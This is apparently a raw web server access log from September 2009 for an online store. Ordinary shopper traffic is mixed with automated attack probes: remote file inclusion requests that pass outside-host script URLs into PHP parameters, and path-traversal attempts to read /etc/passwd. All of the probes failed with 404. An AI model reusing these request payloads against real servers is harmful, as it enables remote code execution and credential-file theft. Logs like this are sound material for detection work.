220.247.11.218 - - [04/Sep/2009:05:00:55 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:56 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:00:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
59.27.95.144 - - [04/Sep/2009:05:00:57 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
62.140.23.192 - - [04/Sep/2009:05:01:01 -0400] "GET /logs/access_log.Q109080900%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:05:01:29 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:05:01:29 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:05:01:30 -0400] "GET /logs/access_log.Q109061200%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:05:01:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B824F0F17770065F501X+M37+ENG HTTP/1.1" 200 76795 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:36 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824F0F17770065F501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:36 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824F0F17770065F501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:37 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824F0F17770065F501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG HTTP/1.1" 200 57438 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:41 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:41 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:41 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:43 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:43 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:43 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:43 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:44 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:44 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:44 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:44 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:44 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:45 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:45 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:01:45 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
222.236.47.182 - - [04/Sep/2009:05:02:19 -0400] "GET /logs/access_log.Q109071300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
201.76.47.207 - - [04/Sep/2009:05:02:22 -0400] "GET /logs/access_log.Q109070200/index2.php?p=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:02:22 -0400] "GET /index2.php?p=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:02:23 -0400] "GET /logs/index2.php?p=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:02:25 -0400] "GET /logs/access_log.Q109070200/index2.php?p=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:02:26 -0400] "GET /index2.php?p=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:02:26 -0400] "GET /logs/index2.php?p=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
78.111.80.234 - - [04/Sep/2009:05:02:37 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:02:37 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:02:40 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:02:40 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:02:44 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:02:54 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:05:03:21 -0400] "GET /logs/access_log.Q109072000%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:05:03:21 -0400] "GET /logs/access_log.Q109080100%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:05:03:26 -0400] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:05:03:26 -0400] "GET /logs/access_log.Q109061200/includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:05:03:26 -0400] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
69.0.163.102 - - [04/Sep/2009:05:04:03 -0400] "GET /logs/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.0.163.102 - - [04/Sep/2009:05:04:03 -0400] "GET /logs/access_log.Q109051500/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.0.163.102 - - [04/Sep/2009:05:04:03 -0400] "GET /index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.0.163.102 - - [04/Sep/2009:05:04:38 -0400] "GET /logs/access_log.Q109051500%20%20/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:04:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.76.47.207 - - [04/Sep/2009:05:04:57 -0400] "GET /index2.php?p=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:04:57 -0400] "GET /index2.php?p=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
114.108.131.141 - - [04/Sep/2009:05:05:02 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:02 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:03 -0400] "GET /logs/access_log.Q109072200////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:04 -0400] "GET /logs/access_log.Q109072500////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.0.163.102 - - [04/Sep/2009:05:05:05 -0400] "GET /logs/access_log.Q109062800%20%20/index2.php?x=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:25 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:25 -0400] "GET /logs/access_log.Q109072200////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:26 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:05:26 -0400] "GET /logs/access_log.Q109072500////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:06:30 -0400] "GET /logs/access_log.Q109072200%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:06:30 -0400] "GET /logs/access_log.Q109072500%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:06:31 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:05:06:32 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
222.236.47.182 - - [04/Sep/2009:05:06:35 -0400] "GET /logs/access_log.Q109071300%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:06:37 -0400] "GET /logs/access_log.Q109072200%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:06:37 -0400] "GET /logs/access_log.Q109072500%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
201.76.47.207 - - [04/Sep/2009:05:06:49 -0400] "GET /logs/error_log.Q109070200/index2.php?p=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
201.76.47.207 - - [04/Sep/2009:05:06:49 -0400] "GET /logs/error_log.Q109070200/index2.php?p=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
220.247.11.218 - - [04/Sep/2009:05:07:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B824007E75700A29501X+M37+ENG HTTP/1.1" 200 56712 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824C0847F7009B1501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:07:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B83410CA7E700E98501Y+M37+ENG HTTP/1.1" 200 58100 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B824007E75700A29501X+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
58.184.252.3 - - [04/Sep/2009:05:07:55 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
58.184.252.3 - - [04/Sep/2009:05:07:55 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:05:08:21 -0400] "GET /logs/error_log.Q109090100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.247.11.218 - - [04/Sep/2009:05:08:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B83470FD76700E35501Y+M37+ENG HTTP/1.1" 200 58184 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B83410CA7E700E98501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
114.108.131.141 - - [04/Sep/2009:05:08:40 -0400] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:08:40 -0400] "GET /logs/access_log.Q109072200////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:08:40 -0400] "GET /logs/access_log.Q109072500////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:08:41 -0400] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:05:08:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B84400FE7C7003DF501Y+M37+ENG HTTP/1.1" 200 58100 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B83470FD76700E35501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
174.37.136.126 - - [04/Sep/2009:05:08:45 -0400] "GET /logs//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.37.136.126 - - [04/Sep/2009:05:08:45 -0400] "GET //skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.37.136.126 - - [04/Sep/2009:05:08:45 -0400] "GET /logs/access_log.Q109081700//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:05:08:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B84460D37370039D501Y+M37+ENG HTTP/1.1" 200 62461 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B84400FE7C7003DF501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
